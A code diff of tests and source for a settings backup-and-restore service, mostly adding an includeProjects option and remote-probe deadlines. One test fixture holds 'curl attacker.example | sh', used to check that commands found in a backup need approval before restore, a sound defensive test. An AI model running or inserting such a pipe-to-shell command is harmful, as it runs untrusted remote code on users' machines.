     expect(repository.remoteCommit).toBeNull();
 
-    await payload.exportTo({ repositoryRoot: repository.rootDir, managedPath: settings.path });
+    await payload.exportTo({ repositoryRoot: repository.rootDir, managedPath: settings.path, includeProjects: false });
     const changes = await gitRepo.getPushChanges(repository);
     expect(changes.map((change) => change.path)).toContain("mux/AGENTS.md");
 
@@ -54,7 +54,7 @@ describe("backup adapters", () => {
     );
 
     const second = await gitRepo.prepare(settings);
-    await payload.exportTo({ repositoryRoot: second.rootDir, managedPath: settings.path });
+    await payload.exportTo({ repositoryRoot: second.rootDir, managedPath: settings.path, includeProjects: false });
     const unchanged = await gitRepo.commitAndPush(second, {
       message: "Back up Xum settings",
       expectedRemoteCommit: second.remoteCommit,
@@ -87,7 +87,7 @@ describe("backup adapters", () => {
     const payload = createBackupPayloadStore({ config });
 
     const repository = await gitRepo.prepare(settings);
-    await payload.exportTo({ repositoryRoot: repository.rootDir, managedPath: settings.path });
+    await payload.exportTo({ repositoryRoot: repository.rootDir, managedPath: settings.path, includeProjects: false });
     await gitRepo.commitAndPush(repository, {
       message: "Back up Xum settings",
       expectedRemoteCommit: repository.remoteCommit,
@@ -121,12 +121,13 @@ describe("backup adapters", () => {
 
     // A preview writes the payload into the cache but never pushes it.
     const first = await gitRepo.prepare(settings);
-    await payload.exportTo({ repositoryRoot: first.rootDir, managedPath: settings.path });
+    await payload.exportTo({ repositoryRoot: first.rootDir, managedPath: settings.path, includeProjects: false });
 
     const second = await gitRepo.prepare(settings);
     const preview = await payload.previewRestore({
       repositoryRoot: second.rootDir,
       managedPath: settings.path,
+      includeProjects: false,
     });
     expect(preview.changes).toEqual([]);
     expect(preview.localOnlyFiles).toContain("AGENTS.md");
@@ -137,7 +138,7 @@ describe("backup adapters", () => {
     const gitRepo = createBackupGitRepo({ cacheRoot });
     const payload = createBackupPayloadStore({ config });
     const prepared = await gitRepo.prepare(settings);
-    await payload.exportTo({ repositoryRoot: prepared.rootDir, managedPath: settings.path });
+    await payload.exportTo({ repositoryRoot: prepared.rootDir, managedPath: settings.path, includeProjects: false });
 
     // Without the preflight this reads as a plain addition, and the restore the user accepts
     // then fails on the same unchanged filesystem state.
@@ -145,7 +146,7 @@ describe("backup adapters", () => {
     await fs.mkdir(path.join(muxRoot, "agents/foo.md"), { recursive: true });
 
     const refused = await payload
-      .previewRestore({ repositoryRoot: prepared.rootDir, managedPath: settings.path })
+      .previewRestore({ repositoryRoot: prepared.rootDir, managedPath: settings.path, includeProjects: false })
       .then(
         () => null,
         (error: unknown) => error
@@ -160,14 +161,14 @@ describe("backup adapters", () => {
     const payload = createBackupPayloadStore({ config });
 
     const first = await gitRepo.prepare(settings);
-    await payload.exportTo({ repositoryRoot: first.rootDir, managedPath: settings.path });
+    await payload.exportTo({ repositoryRoot: first.rootDir, managedPath: settings.path, includeProjects: false });
     await gitRepo.commitAndPush(first, {
       message: "Back up Xum settings",
       expectedRemoteCommit: first.remoteCommit,
     });
 
     const second = await gitRepo.prepare(settings);
-    await payload.exportTo({ repositoryRoot: second.rootDir, managedPath: settings.path });
+    await payload.exportTo({ repositoryRoot: second.rootDir, managedPath: settings.path, includeProjects: false });
     expect(await gitRepo.getPushChanges(second)).toEqual([]);
 
     // Another client advances the branch after this cache fetched it.
@@ -205,7 +206,7 @@ describe("backup adapters", () => {
     const payload = createBackupPayloadStore({ config });
 
     const first = await gitRepo.prepare(settings);
-    await payload.exportTo({ repositoryRoot: first.rootDir, managedPath: settings.path });
+    await payload.exportTo({ repositoryRoot: first.rootDir, managedPath: settings.path, includeProjects: false });
     await gitRepo.commitAndPush(first, {
       message: "Back up Xum settings",
       expectedRemoteCommit: first.remoteCommit,
@@ -214,12 +215,13 @@ describe("backup adapters", () => {
     // A preview rewrites the tracked payload in the cache without pushing it.
     await writeFixtureFile(muxRoot, "AGENTS.md", "local only\n");
     const second = await gitRepo.prepare(settings);
-    await payload.exportTo({ repositoryRoot: second.rootDir, managedPath: settings.path });
+    await payload.exportTo({ repositoryRoot: second.rootDir, managedPath: settings.path, includeProjects: false });
 
     const third = await gitRepo.prepare(settings);
     const preview = await payload.previewRestore({
       repositoryRoot: third.rootDir,
       managedPath: settings.path,
+      includeProjects: false,
     });
     expect(preview.changes).toEqual([{ status: "M", path: "AGENTS.md" }]);
   });
@@ -231,7 +233,7 @@ describe("backup adapters", () => {
     const gitRepo = createBackupGitRepo({ cacheRoot });
     const payload = createBackupPayloadStore({ config });
     const first = await gitRepo.prepare(settings);
-    await payload.exportTo({ repositoryRoot: first.rootDir, managedPath: settings.path });
+    await payload.exportTo({ repositoryRoot: first.rootDir, managedPath: settings.path, includeProjects: false });
     await gitRepo.commitAndPush(first, {
       message: "Back up Xum settings",
       expectedRemoteCommit: first.remoteCommit,
@@ -339,7 +341,7 @@ describe("backup adapters", () => {
     const previousUmask = process.umask(0o022);
     try {
       const repository = await gitRepo.prepare(settings);
-      await payload.exportTo({ repositoryRoot: repository.rootDir, managedPath: settings.path });
+      await payload.exportTo({ repositoryRoot: repository.rootDir, managedPath: settings.path, includeProjects: false });
     } finally {
       process.umask(previousUmask);
     }
@@ -474,7 +476,7 @@ describe("backup adapters", () => {
     const payload = createBackupPayloadStore({ config });
 
     const first = await gitRepo.prepare(settings);
-    await payload.exportTo({ repositoryRoot: first.rootDir, managedPath: settings.path });
+    await payload.exportTo({ repositoryRoot: first.rootDir, managedPath: settings.path, includeProjects: false });
     await gitRepo.commitAndPush(first, {
       message: "Back up Xum settings",
       expectedRemoteCommit: first.remoteCommit,
@@ -486,7 +488,7 @@ describe("backup adapters", () => {
     await writeFixtureFile(muxRoot, "AGENTS.md", "second\n");
     const second = await gitRepo.prepare(settings);
     expect(second.remoteCommit).toBeNull();
-    await payload.exportTo({ repositoryRoot: second.rootDir, managedPath: settings.path });
+    await payload.exportTo({ repositoryRoot: second.rootDir, managedPath: settings.path, includeProjects: false });
     await gitRepo.commitAndPush(second, {
       message: "Back up Xum settings",
       expectedRemoteCommit: second.remoteCommit,
@@ -502,11 +504,12 @@ describe("backup adapters", () => {
     const payload = createBackupPayloadStore({ config });
 
     const repository = await gitRepo.prepare(settings);
-    await payload.exportTo({ repositoryRoot: repository.rootDir, managedPath: settings.path });
+    await payload.exportTo({ repositoryRoot: repository.rootDir, managedPath: settings.path, includeProjects: false });
 
     const preview = await payload.previewRestore({
       repositoryRoot: repository.rootDir,
       managedPath: settings.path,
+      includeProjects: false,
     });
     expect(preview.changes).toEqual([]);
   });
@@ -531,11 +534,12 @@ describe("backup adapters", () => {
     const payload = createBackupPayloadStore({ config });
 
     const repository = await gitRepo.prepare(settings);
-    await payload.exportTo({ repositoryRoot: repository.rootDir, managedPath: settings.path });
+    await payload.exportTo({ repositoryRoot: repository.rootDir, managedPath: settings.path, includeProjects: false });
 
     const preview = await payload.previewRestore({
       repositoryRoot: repository.rootDir,
       managedPath: settings.path,
+      includeProjects: false,
     });
     expect(preview.changes).toEqual([]);
   });
@@ -547,18 +551,20 @@ describe("backup adapters", () => {
     const payload = createBackupPayloadStore({ config });
 
     const repository = await gitRepo.prepare(settings);
-    await payload.exportTo({ repositoryRoot: repository.rootDir, managedPath: settings.path });
+    await payload.exportTo({ repositoryRoot: repository.rootDir, managedPath: settings.path, includeProjects: false });
 
     await fs.chmod(path.join(muxRoot, "skills/demo/run.sh"), 0o644);
     const preview = await payload.previewRestore({
       repositoryRoot: repository.rootDir,
       managedPath: settings.path,
+      includeProjects: false,
     });
     expect(preview.changes).toEqual([{ status: "M", path: "skills/demo/run.sh" }]);
 
     const restored = await payload.restore({
       repositoryRoot: repository.rootDir,
       managedPath: settings.path,
+      includeProjects: false,
     });
     expect(restored.changedFiles).toEqual(["skills/demo/run.sh"]);
     const mode = (await fs.stat(path.join(muxRoot, "skills/demo/run.sh"))).mode;
@@ -571,7 +577,7 @@ describe("backup adapters", () => {
     const gitRepo = createBackupGitRepo({ cacheRoot });
     const payload = createBackupPayloadStore({ config });
     const legacy = await gitRepo.prepare({ ...settings, path: "mux/" });
-    await payload.exportTo({ repositoryRoot: legacy.rootDir, managedPath: legacy.managedPath });
+    await payload.exportTo({ repositoryRoot: legacy.rootDir, managedPath: legacy.managedPath, includeProjects: false });
     await gitRepo.commitAndPush(legacy, {
       message: "Back up Mux settings",
       expectedRemoteCommit: legacy.remoteCommit,
@@ -584,16 +590,19 @@ describe("backup adapters", () => {
     const preview = await payload.previewRestore({
       repositoryRoot: prepared.rootDir,
       managedPath: prepared.managedPath,
+      includeProjects: false,
     });
     expect(preview.changes).toEqual([{ status: "M", path: "AGENTS.md" }]);
 
     await payload.validateRestore({
       repositoryRoot: prepared.rootDir,
       managedPath: prepared.managedPath,
+      includeProjects: false,
     });
     const restored = await payload.restore({
       repositoryRoot: prepared.rootDir,
       managedPath: prepared.managedPath,
+      includeProjects: false,
     });
     expect(restored.changedFiles).toEqual(["AGENTS.md"]);
     expect(await fs.readFile(path.join(muxRoot, "AGENTS.md"), "utf-8")).toBe(
@@ -606,7 +615,7 @@ describe("backup adapters", () => {
     const gitRepo = createBackupGitRepo({ cacheRoot });
     const payload = createBackupPayloadStore({ config });
     const legacy = await gitRepo.prepare({ ...settings, path: "mux/" });
-    await payload.exportTo({ repositoryRoot: legacy.rootDir, managedPath: legacy.managedPath });
+    await payload.exportTo({ repositoryRoot: legacy.rootDir, managedPath: legacy.managedPath, includeProjects: false });
     await gitRepo.commitAndPush(legacy, {
       message: "Back up Mux settings",
       expectedRemoteCommit: legacy.remoteCommit,
@@ -615,7 +624,7 @@ describe("backup adapters", () => {
     // A xum-configured push updates the legacy backup in place rather than creating xum/.
     await writeFixtureFile(muxRoot, "AGENTS.md", "updated instructions\n");
     const prepared = await gitRepo.prepare({ ...settings, path: "xum/" });
-    await payload.exportTo({ repositoryRoot: prepared.rootDir, managedPath: prepared.managedPath });
+    await payload.exportTo({ repositoryRoot: prepared.rootDir, managedPath: prepared.managedPath, includeProjects: false });
     const pushed = await gitRepo.commitAndPush(prepared, {
       message: "Back up Xum settings",
       expectedRemoteCommit: prepared.remoteCommit,
@@ -632,7 +641,7 @@ describe("backup adapters", () => {
 
     await writeFixtureFile(muxRoot, "AGENTS.md", "legacy\n");
     const legacy = await gitRepo.prepare({ ...settings, path: "mux/" });
-    await payload.exportTo({ repositoryRoot: legacy.rootDir, managedPath: legacy.managedPath });
+    await payload.exportTo({ repositoryRoot: legacy.rootDir, managedPath: legacy.managedPath, includeProjects: false });
     await gitRepo.commitAndPush(legacy, {
       message: "Back up Mux settings",
       expectedRemoteCommit: legacy.remoteCommit,
@@ -643,7 +652,7 @@ describe("backup adapters", () => {
     await writeFixtureFile(muxRoot, "AGENTS.md", "canonical\n");
     const seed = path.join(tempDir, "canonical-seed");
     await runGit(["clone", "--quiet", originPath, seed]);
-    await payload.exportTo({ repositoryRoot: seed, managedPath: "xum/" });
+    await payload.exportTo({ repositoryRoot: seed, managedPath: "xum/", includeProjects: false });
     await runGit(["-C", seed, "add", "-A"]);
     await runGit([
       "-C",
@@ -666,6 +675,7 @@ describe("backup adapters", () => {
     const restored = await payload.restore({
       repositoryRoot: prepared.rootDir,
       managedPath: prepared.managedPath,
+      includeProjects: false,
     });
     expect(restored.changedFiles).toEqual(["AGENTS.md"]);
     expect(await fs.readFile(path.join(muxRoot, "AGENTS.md"), "utf-8")).toBe("canonical\n");
@@ -676,7 +686,7 @@ describe("backup adapters", () => {
     const gitRepo = createBackupGitRepo({ cacheRoot });
     const payload = createBackupPayloadStore({ config });
     const canonical = await gitRepo.prepare({ ...settings, path: "xum/" });
-    await payload.exportTo({ repositoryRoot: canonical.rootDir, managedPath: "xum/" });
+    await payload.exportTo({ repositoryRoot: canonical.rootDir, managedPath: "xum/", includeProjects: false });
     await gitRepo.commitAndPush(canonical, {
       message: "Back up Xum settings",
       expectedRemoteCommit: canonical.remoteCommit,
@@ -716,6 +726,7 @@ describe("backup adapters", () => {
     const restored = await payload.restore({
       repositoryRoot: prepared.rootDir,
       managedPath: prepared.managedPath,
+      includeProjects: false,
     });
     expect(restored.changedFiles).toEqual(["AGENTS.md"]);
     expect(await fs.readFile(path.join(muxRoot, "AGENTS.md"), "utf-8")).toBe("canonical\n");
@@ -727,7 +738,7 @@ describe("backup adapters", () => {
     const gitRepo = createBackupGitRepo({ cacheRoot });
     const payload = createBackupPayloadStore({ config });
     const legacy = await gitRepo.prepare({ ...settings, path: "mux/" });
-    await payload.exportTo({ repositoryRoot: legacy.rootDir, managedPath: legacy.managedPath });
+    await payload.exportTo({ repositoryRoot: legacy.rootDir, managedPath: legacy.managedPath, includeProjects: false });
     await gitRepo.commitAndPush(legacy, {
       message: "Back up Mux settings",
       expectedRemoteCommit: legacy.remoteCommit,
@@ -768,6 +779,7 @@ describe("backup adapters", () => {
     const restored = await payload.restore({
       repositoryRoot: prepared.rootDir,
       managedPath: prepared.managedPath,
+      includeProjects: false,
     });
     expect(restored.changedFiles).toEqual(["AGENTS.md"]);
     expect(await fs.readFile(path.join(muxRoot, "AGENTS.md"), "utf-8")).toBe(
@@ -781,7 +793,7 @@ describe("backup adapters", () => {
     const gitRepo = createBackupGitRepo({ cacheRoot });
     const payload = createBackupPayloadStore({ config });
     const legacy = await gitRepo.prepare({ ...settings, path: "mux/" });
-    await payload.exportTo({ repositoryRoot: legacy.rootDir, managedPath: legacy.managedPath });
+    await payload.exportTo({ repositoryRoot: legacy.rootDir, managedPath: legacy.managedPath, includeProjects: false });
     await gitRepo.commitAndPush(legacy, {
       message: "Back up Mux settings",
       expectedRemoteCommit: legacy.remoteCommit,
@@ -813,6 +825,7 @@ describe("backup adapters", () => {
     const restored = await payload.restore({
       repositoryRoot: prepared.rootDir,
       managedPath: prepared.managedPath,
+      includeProjects: false,
     });
     expect(restored.changedFiles).toEqual(["AGENTS.md"]);
     expect(await fs.readFile(path.join(muxRoot, "AGENTS.md"), "utf-8")).toBe(
@@ -826,7 +839,7 @@ describe("backup adapters", () => {
     const payload = createBackupPayloadStore({ config });
 
     const repository = await gitRepo.prepare(settings);
-    await payload.exportTo({ repositoryRoot: repository.rootDir, managedPath: settings.path });
+    await payload.exportTo({ repositoryRoot: repository.rootDir, managedPath: settings.path, includeProjects: false });
 
     config.state = {
       projects: new Map(),
@@ -835,6 +848,7 @@ describe("backup adapters", () => {
     const unchanged = await payload.previewRestore({
       repositoryRoot: repository.rootDir,
       managedPath: settings.path,
+      includeProjects: false,
     });
     expect(unchanged.changes).toEqual([]);
 
@@ -842,6 +856,7 @@ describe("backup adapters", () => {
     const changed = await payload.previewRestore({
       repositoryRoot: repository.rootDir,
       managedPath: settings.path,
+      includeProjects: false,
     });
     expect(changed.changes).toEqual([{ status: "M", path: "preferences.json" }]);
   });
@@ -857,7 +872,7 @@ describe("backup adapters", () => {
     await fs.symlink(outside, path.join(repository.rootDir, "linked"));
 
     try {
-      await payload.exportTo({ repositoryRoot: repository.rootDir, managedPath: "linked/mux" });
+      await payload.exportTo({ repositoryRoot: repository.rootDir, managedPath: "linked/mux", includeProjects: false });
       throw new Error("Expected the symlinked ancestor to be rejected");
     } catch (error) {
       if (!(error instanceof Error)) throw error;
@@ -890,7 +905,7 @@ describe("backup adapters", () => {
     const payload = createBackupPayloadStore({ config });
 
     const repository = await gitRepo.prepare(settings);
-    await payload.exportTo({ repositoryRoot: repository.rootDir, managedPath: settings.path });
+    await payload.exportTo({ repositoryRoot: repository.rootDir, managedPath: settings.path, includeProjects: false });
 
     await writeFixtureFile(muxRoot, "AGENTS.md", "locally edited\n");
     await fs.rm(path.join(muxRoot, "agents/shared.md"));
@@ -899,6 +914,7 @@ describe("backup adapters", () => {
     const preview = await payload.previewRestore({
       repositoryRoot: repository.rootDir,
       managedPath: settings.path,
+      includeProjects: false,
     });
     expect(preview.changes).toEqual([
       { status: "M", path: "AGENTS.md" },
@@ -917,7 +933,7 @@ describe("backup adapters", () => {
     const payload = createBackupPayloadStore({ config });
 
     const repository = await gitRepo.prepare(settings);
-    await payload.exportTo({ repositoryRoot: repository.rootDir, managedPath: settings.path });
+    await payload.exportTo({ repositoryRoot: repository.rootDir, managedPath: settings.path, includeProjects: false });
 
     // Commands are never exported, so the only way a backup carries one is if someone with
     // repository write access put it there.
@@ -936,6 +952,7 @@ describe("backup adapters", () => {
     const preview = await payload.previewRestore({
       repositoryRoot: repository.rootDir,
       managedPath: settings.path,
+      includeProjects: false,
     });
     expect(preview.commandApprovals.map((approval) => approval.command)).toEqual([
       "curl attacker.example | sh",
@@ -945,6 +962,7 @@ describe("backup adapters", () => {
       await payload.validateRestore({
         repositoryRoot: repository.rootDir,
         managedPath: settings.path,
+        includeProjects: false,
       });
       throw new Error("Expected the missing command approval to block validation");
     } catch (error) {
@@ -955,6 +973,7 @@ describe("backup adapters", () => {
       repositoryRoot: repository.rootDir,
       managedPath: settings.path,
       approvedCommandTokens: preview.commandApprovals.map((approval) => approval.token),
+      includeProjects: false,
     });
   });
 
@@ -965,7 +984,7 @@ describe("backup adapters", () => {
     const payload = createBackupPayloadStore({ config });
 
     const repository = await gitRepo.prepare(settings);
-    await payload.exportTo({ repositoryRoot: repository.rootDir, managedPath: settings.path });
+    await payload.exportTo({ repositoryRoot: repository.rootDir, managedPath: settings.path, includeProjects: false });
 
     await writeFixtureFile(muxRoot, "AGENTS.md", "locally edited\n");
     await writeFixtureFile(muxRoot, "agents/local-only.md", "local only\n");
@@ -980,6 +999,7 @@ describe("backup adapters", () => {
     const restored = await payload.restore({
       repositoryRoot: repository.rootDir,
       managedPath: settings.path,
+      includeProjects: false,
     });
 
     expect(await fs.readFile(path.join(muxRoot, "AGENTS.md"), "utf-8")).toBe("backed up\n");
@@ -1000,7 +1020,7 @@ describe("backup adapters", () => {
     const gitRepo = createBackupGitRepo({ cacheRoot });
     const payload = createBackupPayloadStore({ config });
     const repository = await gitRepo.prepare(settings);
-    await payload.exportTo({ repositoryRoot: repository.rootDir, managedPath: settings.path });
+    await payload.exportTo({ repositoryRoot: repository.rootDir, managedPath: settings.path, includeProjects: false });
 
     config.state = { projects: new Map(), userPreferences: { appearance: { theme: "light" } } };
     // A swallowed write failure: the edit callback runs, editConfig resolves, and the
@@ -1011,7 +1031,7 @@ describe("backup adapters", () => {
     });
 
     try {
-      await payload.restore({ repositoryRoot: repository.rootDir, managedPath: settings.path });
+      await payload.restore({ repositoryRoot: repository.rootDir, managedPath: settings.path, includeProjects: false });
       throw new Error("Expected the lost preferences write to be reported");
     } catch (error) {
       if (!(error instanceof Error)) throw error;
@@ -1026,7 +1046,7 @@ describe("backup adapters", () => {
     const payload = createBackupPayloadStore({ config });
 
     const repository = await gitRepo.prepare(settings);
-    await payload.exportTo({ repositoryRoot: repository.rootDir, managedPath: settings.path });
+    await payload.exportTo({ repositoryRoot: repository.rootDir, managedPath: settings.path, includeProjects: false });
 
     config.state = { projects: new Map(), userPreferences: { appearance: { theme: "light" } } };
     config.beforeEdit = () => {
@@ -1042,6 +1062,7 @@ describe("backup adapters", () => {
     await payload.restore({
       repositoryRoot: repository.rootDir,
       managedPath: settings.path,
+      includeProjects: false,
     });
 
     expect(config.state.userPreferences?.appearance?.theme).toBe("dark");
@@ -1058,7 +1079,7 @@ describe("backup adapters", () => {
     const payload = createBackupPayloadStore({ config });
     const snapshotRoot = path.join(tempDir, "snapshot");
 
-    await payload.writeSafetySnapshot(snapshotRoot);
+    await payload.writeSafetySnapshot(snapshotRoot, { includeProjectMemory: false });
 
     expect(await fs.readFile(path.join(snapshotRoot, "AGENTS.md"), "utf-8")).toBe(
       "before restore\n"
@@ -1083,7 +1104,7 @@ describe("backup adapters", () => {
     // snapshot is unredacted, so anything wider than the owner leaks MCP credentials.
     const previousUmask = process.umask(0o022);
     try {
-      await payload.writeSafetySnapshot(snapshotRoot);
+      await payload.writeSafetySnapshot(snapshotRoot, { includeProjectMemory: false });
     } finally {
       process.umask(previousUmask);
     }
@@ -1103,7 +1124,7 @@ describe("backup adapters", () => {
     const gitRepo = createBackupGitRepo({ cacheRoot });
     const payload = createBackupPayloadStore({ config });
     const repository = await gitRepo.prepare(settings);
-    await payload.exportTo({ repositoryRoot: repository.rootDir, managedPath: settings.path });
+    await payload.exportTo({ repositoryRoot: repository.rootDir, managedPath: settings.path, includeProjects: false });
     for (const alias of ["Note.md", "NOTE.md"]) {
       await fs.link(
         path.join(muxRoot, "skills/demo/note.md"),
@@ -1115,6 +1136,7 @@ describe("backup adapters", () => {
     const preview = await payload.previewRestore({
       repositoryRoot: repository.rootDir,
       managedPath: settings.path,
+      includeProjects: false,
     });
 
     expect(preview.localOnlyFiles).toEqual(["skills/demo/NOTE.md", "skills/demo/Note.md"]);
@@ -1129,7 +1151,7 @@ describe("backup adapters", () => {
     const payload = createBackupPayloadStore({ config });
     const snapshotRoot = path.join(tempDir, "case-snapshot");
 
-    await payload.writeSafetySnapshot(snapshotRoot);
+    await payload.writeSafetySnapshot(snapshotRoot, { includeProjectMemory: false });
 
     expect(await fs.readFile(path.join(snapshotRoot, "skills/demo/Foo.md"), "utf-8")).toBe(
       "upper\n"
@@ -1145,7 +1167,7 @@ describe("backup adapters", () => {
     const payload = createBackupPayloadStore({ config });
 
     const repository = await gitRepo.prepare(settings);
-    await payload.exportTo({ repositoryRoot: repository.rootDir, managedPath: settings.path });
+    await payload.exportTo({ repositoryRoot: repository.rootDir, managedPath: settings.path, includeProjects: false });
     await gitRepo.commitAndPush(repository, {
       message: "Back up Xum settings",
       expectedRemoteCommit: repository.remoteCommit,
@@ -1153,7 +1175,7 @@ describe("backup adapters", () => {
 
     await fs.rename(path.join(muxRoot, "agents/first.md"), path.join(muxRoot, "agents/second.md"));
     const next = await gitRepo.prepare(settings);
-    await payload.exportTo({ repositoryRoot: next.rootDir, managedPath: settings.path });
+    await payload.exportTo({ repositoryRoot: next.rootDir, managedPath: settings.path, includeProjects: false });
 
     const changes = await gitRepo.getPushChanges(next);
     expect(changes.map((change) => change.path)).toContain("mux/agents/second.md");
@@ -1168,7 +1190,7 @@ describe("backup adapters", () => {
     const payload = createBackupPayloadStore({ config });
 
     const repository = await gitRepo.prepare(settings);
-    await payload.exportTo({ repositoryRoot: repository.rootDir, managedPath: settings.path });
+    await payload.exportTo({ repositoryRoot: repository.rootDir, managedPath: settings.path, includeProjects: false });
 
     const paths = (await gitRepo.getPushChanges(repository)).map((change) => change.path);
 

--- a/src/node/services/backup/adapters.ts
+++ b/src/node/services/backup/adapters.ts
@@ -309,7 +309,7 @@ export function createBackupPayloadStore(options: { config: Config }): BackupPay
    * outside the registration lock; a project removed and another registered at the same path
    * during discovery would otherwise carry the removed project's remote into the new
    * project's entry. The listing under the lock uses the hints only if nothing has been
-   * written to the registry since: the config file's write generation changes on every save
+   * written to the registry since: the config file's write generation differs for every save
    * — so a removal and a re-registration with identical config, invisible in the content, is
    * seen — and the content is compared too. Conservative by design, since config records no
    * per-registration identity: any write in the window costs this export its hints, never

--- a/src/node/services/backup/adapters.ts
+++ b/src/node/services/backup/adapters.ts
@@ -38,7 +38,10 @@ import {
   backupPayloadExists,
   bundleEntryFiles,
   collectOverwritableProjectMemory,
+  matchedProjectWrites,
+  readProjectMemoryOrigins,
   serializeProjectBundleManifest,
+  writeProjectMemoryOrigin,
   collectProjectBundle,
   planProjectBundleRestore,
   projectBundleExists,
@@ -199,12 +202,19 @@ function describeMissingBackup(managedPath: string): string {
 
 /** Concurrent `git remote get-url` probes during bundle export. */
 const REMOTE_DISCOVERY_CONCURRENCY = 8;
+/** Per-probe ceiling and the deadline for the whole discovery pass; remotes are hints, not requirements. */
+const REMOTE_PROBE_TIMEOUT_MS = 5_000;
+const REMOTE_DISCOVERY_DEADLINE_MS = 20_000;
 
 /** Best-effort: a missing origin, a non-git directory, or a hung git must never fail an export. */
-async function readProjectGitRemote(projectPath: string): Promise<string | undefined> {
+async function readProjectGitRemote(
+  projectPath: string,
+  timeoutMs: number
+): Promise<string | undefined> {
+  if (timeoutMs <= 0) return undefined;
   try {
     using gitProcess = execFileAsync("git", ["-C", projectPath, "remote", "get-url", "origin"], {
-      timeoutMs: 5_000,
+      timeoutMs,
       maxOutputBytes: 64 * 1024,
       killTreeOnTermination: true,
     });
@@ -289,15 +299,20 @@ export function createBackupPayloadStore(options: { config: Config }): BackupPay
       throw new Error(`Backup has more than ${MAX_BACKUP_PROJECT_ENTRIES} projects`);
     }
     // Each probe has its own timeout, so sequential discovery over many projects on slow
-    // filesystems could stall a preview or push for minutes; bounded parallelism keeps the
-    // worst case proportional to the limit, not the project count.
+    // filesystems could stall a preview or push for minutes; bounded parallelism plus one
+    // deadline for the whole pass caps the wait regardless of the project count. Projects
+    // probed after the deadline simply record no remote.
     const probes = new AsyncSemaphore(REMOTE_DISCOVERY_CONCURRENCY);
+    const deadline = Date.now() + REMOTE_DISCOVERY_DEADLINE_MS;
     return await Promise.all(
       projects.map(async ([projectPath, projectConfig]) => {
         const slot = await probes.acquire();
         let gitRemote: string | undefined;
         try {
-          gitRemote = await readProjectGitRemote(projectPath);
+          gitRemote = await readProjectGitRemote(
+            projectPath,
+            Math.min(REMOTE_PROBE_TIMEOUT_MS, deadline - Date.now())
+          );
         } finally {
           slot.release();
         }
@@ -336,7 +351,15 @@ export function createBackupPayloadStore(options: { config: Config }): BackupPay
   ): Promise<{ bundle: BackupProjectBundle; plan: ProjectBundleRestorePlan } | null> {
     const bundle = await readProjectBundle(sourceDir);
     if (bundle === null) return null;
-    return { bundle, plan: planProjectBundleRestore(bundle, registeredProjectDirs()) };
+    const registered = registeredProjectDirs();
+    return {
+      bundle,
+      plan: planProjectBundleRestore(
+        bundle,
+        registered,
+        await readProjectMemoryOrigins(muxRoot, registered)
+      ),
+    };
   }
 
   /** Restore-preview statuses for matched entries, diffed against the local memory files. */
@@ -353,12 +376,14 @@ export function createBackupPayloadStore(options: { config: Config }): BackupPay
     const localByPath = new Map(localBundle.files.map((file) => [file.path, file]));
     const changes: BackupFileChange[] = [];
     for (const match of plan.matched) {
-      for (const file of match.files) {
-        const existing = localByPath.get(file.path);
+      // Reported at the local destination, which differs from the bundle path for a
+      // project matched through an earlier import.
+      for (const write of matchedProjectWrites(match)) {
+        const existing = localByPath.get(write.path);
         if (existing === undefined) {
-          changes.push({ status: "A", path: file.path });
-        } else if (!existing.content.equals(file.content)) {
-          changes.push({ status: "M", path: file.path });
+          changes.push({ status: "A", path: write.path });
+        } else if (!existing.content.equals(write.content)) {
+          changes.push({ status: "M", path: write.path });
         }
       }
     }
@@ -535,7 +560,7 @@ export function createBackupPayloadStore(options: { config: Config }): BackupPay
       // destinations) belong to the preflight too: found only inside the restore, they
       // would surface after the core settings were already overwritten.
       for (const match of bundlePlan.plan.matched) {
-        await assertProjectMemoryWritesAllowed(muxRoot, match.files);
+        await assertProjectMemoryWritesAllowed(muxRoot, matchedProjectWrites(match));
       }
       // So does the recovery copy: a destination that cannot be snapshotted (a local file
       // past the backup budgets) refuses the restore here, not after the core writes. The
@@ -638,7 +663,7 @@ export function createBackupPayloadStore(options: { config: Config }): BackupPay
             const matched = bundlePlan.plan.matched.filter(
               (match) =>
                 validatedMatched.has(match.entry.path) &&
-                registered.get(match.entry.path) === match.entry.memoryDir
+                registered.get(match.projectPath) === match.localMemoryDir
             );
             if (matched.length > 0) {
               // Exactly the files these writes can overwrite: not whole project directories,
@@ -657,18 +682,16 @@ export function createBackupPayloadStore(options: { config: Config }): BackupPay
               let written: string[];
               try {
                 written = (
-                  await writeProjectMemoryFiles(
-                    muxRoot,
-                    match.files.map((file) => ({ path: file.path, content: file.content })),
-                    { addOnly: false }
-                  )
+                  await writeProjectMemoryFiles(muxRoot, matchedProjectWrites(match), {
+                    addOnly: false,
+                  })
                 ).written;
               } catch (error) {
                 // Files written so far — earlier entries and this one's partial progress —
                 // are on disk; the failure must still announce them.
                 if (error instanceof ProjectMemoryWriteError && error.written.length > 0) {
                   restoredProjectMemory.push({
-                    projectPath: match.entry.path,
+                    projectPath: match.projectPath,
                     files: error.written,
                   });
                 }
@@ -680,7 +703,7 @@ export function createBackupPayloadStore(options: { config: Config }): BackupPay
               }
               if (written.length > 0) {
                 changedFiles.push(...written);
-                restoredProjectMemory.push({ projectPath: match.entry.path, files: written });
+                restoredProjectMemory.push({ projectPath: match.projectPath, files: written });
               }
             }
           });
@@ -711,14 +734,18 @@ export function createBackupPayloadStore(options: { config: Config }): BackupPay
       );
       // Token lookup rather than trusting any caller-named entry: the token binds the
       // approval to the exact entry and content, so a miss here is defensive only.
-      const rekeyedWrites = (importOptions: { token: string; targetPath: string }) => {
-        const entry = entriesByToken.get(importOptions.token);
+      const entryFor = (token: string): BackupProjectBundleEntry => {
+        const entry = entriesByToken.get(token);
         if (entry === undefined) {
           throw new BackupServiceError(
             "INVALID_BACKUP",
             "The approved project import no longer matches the backup"
           );
         }
+        return entry;
+      };
+      const rekeyedWrites = (importOptions: { token: string; targetPath: string }) => {
+        const entry = entryFor(importOptions.token);
         const targetDir = projectMemoryDirName(importOptions.targetPath);
         return bundleEntryFiles(bundle.files, entry).map((file) => ({
           path: rekeyProjectMemoryPath(file.path, targetDir),
@@ -730,9 +757,18 @@ export function createBackupPayloadStore(options: { config: Config }): BackupPay
           await assertProjectMemoryWritesAllowed(muxRoot, rekeyedWrites(importOptions));
         },
         async importProjectMemory(importOptions) {
-          const { written, skipped } = await withMemoryLock(() =>
-            writeProjectMemoryFiles(muxRoot, rekeyedWrites(importOptions), { addOnly: true })
-          );
+          const entry = entryFor(importOptions.token);
+          const targetDir = projectMemoryDirName(importOptions.targetPath);
+          const { written, skipped } = await withMemoryLock(async () => {
+            const result = await writeProjectMemoryFiles(muxRoot, rekeyedWrites(importOptions), {
+              addOnly: true,
+            });
